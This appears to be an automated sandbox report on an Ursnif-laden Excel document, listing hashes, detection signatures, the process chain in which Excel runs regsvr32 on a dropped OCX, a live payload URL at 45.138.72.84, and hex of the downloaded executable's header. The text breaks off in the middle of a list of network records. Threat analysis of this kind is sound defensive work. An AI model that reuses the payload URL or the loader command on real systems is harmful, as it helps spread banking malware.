Play interactive tourEdit tour

# Analysis Report Rrapporto.xlsb

## Overview

### General Information

 Sample Name: Rrapporto.xlsb Analysis ID: 316011 MD5: 4dddb0320eac6050d6360c92c104d05c SHA1: 816db7af62de3dc200b88357a5341c6ce184cc93 SHA256: ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f Most interesting Screenshot:

### Detection

Hidden Macro 4.0 Ursnif
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses code obfuscation techniques (call, push, ret)

### Classification

 System is w10x64EXCEL.EXE (PID: 5716 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)regsvr32.exe (PID: 1620 cmdline: regsvr32 -s C:\ProgramData\Dori.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)iexplore.exe (PID: 5104 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 5900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)iexplore.exe (PID: 1296 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 5428 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)iexplore.exe (PID: 2856 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)iexplore.exe (PID: 4676 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 4176 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)iexplore.exe (PID: 5492 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 5844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)iexplore.exe (PID: 4476 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 1056 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
Click to see the 29 entries

## Sigma Overview

### System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell Show sources
 Source: Process started Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5716, ProcessCommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, ProcessId: 1620

## Signature Overview

### AV Detection:

 Antivirus detection for URL or domain Show sources
 Source: http://45.138.72.84/10.11nov322.gif Avira URL Cloud: Label: malware Source: http://45.138.72.84/10.11nov322.gif Avira URL Cloud: Label: malware
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 1.2.regsvr32.exe.320000.1.unpack Avira: Label: TR/Patched.Ren.Gen Source: 1.2.regsvr32.exe.320000.1.unpack Avira: Label: TR/Patched.Ren.Gen

### Software Vulnerabilities:

 Document exploit detected (drops PE files) Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: 10.11nov322[1].gif.0.dr Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: 10.11nov322[1].gif.0.dr Jump to dropped file
 Document exploit detected (process start blacklist hit) Show sources

### Networking:

 Creates a COM Internet Explorer object Show sources
 Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Nov 2020 13:07:52 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 13 Nov 2020 08:48:47 GMTETag: "23400-5b3f918bfb9c0"Accept-Ranges: bytesContent-Length: 144384Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Nov 2020 13:07:52 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 13 Nov 2020 08:48:47 GMTETag: "23400-5b3f918bfb9c0"Accept-Ranges: bytesContent-Length: 144384Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 JA3 SSL client fingerprint seen in connection with other malware Show sources
 Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877 Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
 Connects to IPs without corresponding DNS lookups Show sources
 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 